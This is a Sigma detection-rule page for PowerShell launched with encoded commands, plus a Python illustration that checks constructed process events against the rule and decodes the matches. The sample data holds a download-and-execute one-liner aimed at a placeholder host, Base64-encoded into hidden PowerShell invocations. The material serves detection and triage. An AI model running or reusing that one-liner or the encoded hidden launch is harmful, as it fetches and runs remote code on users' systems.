
Suspicious PowerShell Encoded Command Patterns

Sigma Rules

Summary
This rule flags process-creation events in which powershell.exe or pwsh.exe is launched with an encoded command, a pattern common in malware infection chains because the Base64 blob hides the script body from casual command-line inspection. The detection combines two selections: the image must be one of the PowerShell executables, and the command line must contain one of the abbreviated forms of the -EncodedCommand switch that the PowerShell host accepts. A filter excludes invocations spawned by the Microsoft Guest Configuration worker process, which legitimately runs encoded PowerShell and would otherwise generate constant noise. An encoded invocation is not malicious by itself, so alerts should be triaged by decoding the payload (Base64 over UTF-16LE text) and reviewing the resulting script. The rule's value is surfacing payload delivery and post-exploitation activity, including lateral movement, that relies on PowerShell because of its ubiquity and deep integration with Windows.
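The following Python script is an added illustration of the detection logic described above, not the Sigma rule itself or code from the rule's author. It evaluates a handful of constructed Sysmon-style process-creation events against the same three conditions (PowerShell image, encoded-command switch, Guest Configuration filter) and decodes the matching payloads for triage. The set of accepted switch abbreviations is derived from PowerShell's prefix matching of -EncodedCommand plus the documented -ec alias, and the filter assumes the Guest Configuration worker appears as a parent image named gc_worker.exe; both are assumptions of this example rather than the rule's exact pattern list.

```python
import base64
import binascii

# Constructed sample payload: what an attacker might hide behind -EncodedCommand.
# The domain is a reserved .invalid name, so nothing here resolves or runs.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
# PowerShell expects Base64 over UTF-16LE, not UTF-8.
PAYLOAD = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (Sysmon Event ID 1 shape); not real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {PAYLOAD}"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"pwsh.exe -ec {PAYLOAD}"},
    # Assumed parent path for the Guest Configuration worker; should be filtered out.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\ProgramData\GuestConfig\bin\gc_worker.exe",
     "CommandLine": f"powershell.exe -EncodedCommand {PAYLOAD}"},
    # Benign: PowerShell without an encoded command.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # Not PowerShell at all, even though the switch text appears.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe -enc notes.txt"},
]

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
# Assumed filter: the Guest Configuration worker as parent process.
GC_WORKER_PARENT = "\\gc_worker.exe"

# Every prefix of "encodedcommand" (powershell.exe resolves unambiguous prefixes,
# and treats bare -e as EncodedCommand) plus the -ec alias. Assumption of this
# example; the rule's own list of patterns may differ.
ENCODED_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}


def _switch_tokens(command_line):
    """Yield (index, token) for tokens that look like PowerShell switches."""
    for i, token in enumerate(command_line.split()):
        if token.startswith(("-", "/")) and token[1:].lower() in ENCODED_FLAGS:
            yield i, token


def has_encoded_flag(command_line):
    """True if the command line carries any accepted form of -EncodedCommand."""
    return any(True for _ in _switch_tokens(command_line))


def matches_rule(event):
    """Apply: selection_img AND selection_cli AND NOT filter_gc_worker."""
    image = event.get("Image", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return False
    if not has_encoded_flag(event.get("CommandLine", "")):
        return False
    if event.get("ParentImage", "").lower().endswith(GC_WORKER_PARENT):
        return False
    return True


def decode_encoded_command(command_line):
    """Return the decoded script that follows the encoded switch, or None."""
    tokens = command_line.split()
    for i, _ in _switch_tokens(command_line):
        if i + 1 >= len(tokens):
            return None
        try:
            raw = base64.b64decode(tokens[i + 1], validate=True)
        except binascii.Error:
            return None  # switch present but argument is not valid Base64
        return raw.decode("utf-16-le", errors="replace")
    return None


def triage(events):
    """Alerts as (command line, decoded payload) pairs for matching events."""
    return [(e["CommandLine"], decode_encoded_command(e["CommandLine"]))
            for e in events if matches_rule(e)]


if __name__ == "__main__":
    for cmd, decoded in triage(EVENTS):
        print("ALERT:", cmd[:70] + ("..." if len(cmd) > 70 else ""))
        print("  decoded:", decoded)
```

Running the script produces two alerts (the cmd.exe-spawned powershell.exe and the pwsh.exe invocation), each with the decoded download-and-execute one-liner; the gc_worker.exe child is suppressed by the filter, and the -ExecutionPolicy and notepad.exe events never match. Decoding at triage time is what turns this rule from a volume indicator into an actionable one: the decoded text, not the Base64, is what an analyst compares against known-good automation.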
Categories
  • Windows
  • Endpoint
  • Cloud
Data Sources
  • Process
Created: 2022-05-24